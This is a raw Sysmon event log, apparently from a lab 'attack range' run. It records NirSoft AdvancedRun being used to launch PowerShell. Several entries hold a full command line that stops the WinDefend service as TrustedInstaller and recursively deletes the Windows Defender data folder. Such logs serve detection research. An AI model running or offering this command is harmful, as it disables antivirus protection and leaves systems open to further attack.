17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928800Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft 
Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928799Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928798Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928797Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 
734700x80000000000000003928796Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928795Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928794Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928793Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.240{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different 
settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000003928792Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.224{834264DD-DAF8-61EA-5B00-000000002702}41004280C:\Windows\system32\csrss.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003928791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.224{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Win
dows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni
.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003928790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.234{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003927755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:10:52.685{834264DD-E91C-61EA-BC02-000000002702}4044C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Env:temp\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $Env:temp\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003927383Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:10:45.386{834264DD-E915-61EA-B902-000000002702}3796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path $Env:temp\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003926111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:09:42.683{834264DD-E8D6-61EA-AF02-000000002702}3768C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {if(Test-Path -Path $Env:temp\advancedrun\advancedrun.exe) {exit 0} else {exit 1}} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003924439Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:44.982{834264DD-E89C-61EA-A302-000000002702}2972C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$Env:temp\advancedrun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run $Env:temp\advancedrun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003924321Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:30.755{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 
10341000x80000000000000003924294Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924293Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 
10341000x80000000000000003924292Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924291Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924290Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924289Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924286Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:08:26.396{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924285Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:08:26.365{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E88A-61EA-A002-000000002702}2180C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003924284Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003923715Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:07:54.101{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E523-61EA-0C02-000000002702}2256C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000003923402Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:07:36.257{834264DD-E858-61EA-9802-000000002702}2772C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {\""$Env:temp\advancedrun\advancedrun.exe\"" /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run \""$Env:temp\advancedrun\advancedrun.exe\"" \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 154100x80000000000000003917595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 16:59:41.883{834264DD-E67D-61EA-4B02-000000002702}5456C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$env:TEMP\advancedrun\AdvancedRun.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 
